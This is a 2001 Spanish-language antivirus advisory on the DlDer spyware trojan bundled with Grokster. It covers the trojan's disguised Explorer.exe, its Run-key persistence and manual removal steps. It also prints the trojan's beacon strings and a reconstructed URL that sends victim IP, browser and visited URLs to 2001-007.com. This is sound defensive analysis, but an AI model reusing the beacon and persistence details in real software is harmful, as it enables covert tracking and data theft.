|
VSantivirus No. 539 - Año 6 - Sábado 29 de diciembre de 2001
Actualizado 1 de enero de 2002.
Troj/DlDer. Spyware instalado por
varias utilidades.
Nombre: Troj/DlDer
Alias: DlDer, Trojan.Win32.DlDer, Troj_DlDer, TROJ_DLDER.A, Trojan/W32.Dlder,
W32.DlDer.Trojan, Troj/Download-A.
Tamaño: dlder.exe (40,960 bytes), explorer.exe (31,232 bytes)
Fuente: F-Secure, Symantec, Trend Micro, McAfee y propias.
Grokster es una utilidad gratuita, que hace lo mismo que el conocido Gnutella!, o sea, permite el intercambio Pc a Pc (buscar y descargar) de archivos de audio, video, imágenes, documentos y programas.
Según las últimas investigaciones, Grokster estaría relacionado con un nuevo troyano que desde hace pocos días está circulando por la red, pero no es el único programa involucrado (ver VSAntivirus 542 del 1/ene/02).
El troyano, escrito en Visual C++, consta de dos partes, y una vez instalado en el sistema del usuario infectado, realiza constantemente actualizaciones de su componente principal (cada 2.5 minutos), conectándose al dominio 2001-007.com, al mismo tiempo que envía allí datos que identifican a la víctima (dirección IP, navegador usado), y todas las direcciones (URLs) de todas las ventanas del explorador que estuvieran activas.
Esto abre un peligroso agujero en la seguridad del sistema infectado, así como viola la privacidad del usuario cuya computadora es infectada. Además, se trata de una situación muy peligrosa, ya que también es capaz de descargar y ejecutar archivos.
El componente principal del troyano tiene el mismo nombre de un archivo legítimo de Windows, Explorer.exe (tenga cuidado con esto si decide eliminarlo en forma manual). Sin embargo su ubicación no es la del verdadero archivo
Explorer.exe, sino en un directorio llamado Explorer que a su vez cuelga del directorio de Windows, lugar donde se copia con los atributos de oculto:
C:\WINDOWS\explorer\Explorer.exe
Este es el componente principal, el cuál es constantemente actualizado por la segunda parte del troyano, la que además le da el nombre:
C:\WINDOWS\DlDer.exe
La infección ocurre con la llegada de este componente, el cuál luego descarga y actualiza al verdadero código del caballo de Troya, el falso
Explorer.exe.
El troyano modifica el registro para ejecutarse en cada reinicio de Windows:
HKLM\SOFTWARE\Microsoft\windows\currentversion\run
dlder = C:\WINDOWS\explorer\explorer.exe
Puede ser también:
dlder = C:\WINDOWS\DlDer.exe
También crea esta clave en el registro para almacenar información necesaria para su funcionamiento:
HKLM\SOFTWARE\Games\Clicktilluwin
Se han detectado varios programas que instalan este caballo de Troya (ver VSAntivirus 542 del 1/ene/02).
Uno de los primeros en ser denunciados, es el Grokster, que mencionábamos al principio.
Se instala con uno de sus componentes (clicktilluwin). Pero aunque la instalación de éste es optativa, parece ser que el troyano se instala igual aunque se le indique no hacerlo.
En el código del DLDER.EXE, figura esta referencia:
\SOFTWARE\games\clicktilluwin
Como dijimos, al ejecutarse el DlDer.exe por primera vez, se produce la descarga del
Explorer.exe del Web mencionado antes, el cuál se copia a la carpeta
WINDOWS\explorer, y luego modifica el registro, para continuar ejecutándose cada vez que se enciende o reinicia la computadora.
El proceso se sigue repitiendo. Conexión al sitio 2001-007.com, reportes de los datos obtenidos en la computadora, robo de todas las direcciones Web visitadas por la víctima, etc.
El componente que se conecta para actualizarse, contiene la siguiente información en su código:
GET /index.asp?User_IP=
www.2001-007.com
userid
127
Netscape Navigator
Internet Explorer_Server
open
IEXPLORE.EXE
http:\\localhost
http:\\127.
&User_URL=
GET /index.asp?User_ID=
http:
Edit
Un examen del sitio, devuelve errores al intentar obtener alguna respuesta (hasta el momento de escribir este reporte, seguía activo).
Algunos de los datos vistos arriba, parecen indicar el tipo de información que se envía, incluida la dirección IP de la víctima.
AL usar el mismo comando que utiliza el troyano (una llamada a
http://www.2001-007.com/index.asp?UserURL=GET+/&User_IP=127.0.0.1&userid=127&User_Browser=IE), se devuelve un valor que va aumentando, presumiblemente un registro de la cantidad de máquinas afectadas.
Cómo borrar manualmente el troyano
Para borrar manualmente el troyano, reinicie Windows en modo a prueba de fallos, como se indica en este artículo:
VSantivirus No. 499 - 19/nov/01
Cómo iniciar su computadora en Modo a prueba de fallos.
http://www.vsantivirus.com/faq-modo-fallo.htm
Luego, siga estos pasos:
1. Seleccione Inicio, Buscar, Archivos o carpetas
2. Teclee EXPLORER.EXE y pulse ENTER
3. Si aparece, SOLAMENTE borre el archivo en esta ubicación (en la carpeta
EXPLORER):
C:\WINDOWS\explorer\Explorer.exe
Tenga en cuenta que C:\WINDOWS\Explorer.exe es el archivo legítimo de Windows (está en la carpeta
WINDOWS). ¡No lo borre!...
4. Repita los pasos 1 a 3 para buscar y borrar el siguiente archivo:
DLDER.EXE
5. Seleccione Inicio, Ejecutar, teclee REGEDIT
y pulse Enter
6. En el panel izquierdo del editor de registro de Windows, pinche en el signo "+" hasta abrir la siguiente rama:
HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
CurrentVersion
Run
7. Pinche sobre la carpeta "Run". En el panel de la derecha pinche sobre la entrada
"dlder" y pulse la tecla SUPR o DEL. Conteste afirmativamente la pregunta de si desea borrar la clave.
8. Use "Registro", "Salir" para salir del editor y confirmar los cambios.
9. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar).
Notas:
Si el sistema operativo instalado es Windows Me, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en este artículo:
VSantivirus No. 499 - 19/nov/01
Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm
Más información:
VSantivirus No. 542 - 1/ene/02
Varios programas de uso gratuito, instalan troyano DlDer
http://www.vsantivirus.com/01-01-02.htm
VSantivirus No. 547 - 6/ene/02
DlDer, un espía en casa
http://www.vsantivirus.com/06-01-02b.htm
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
|
|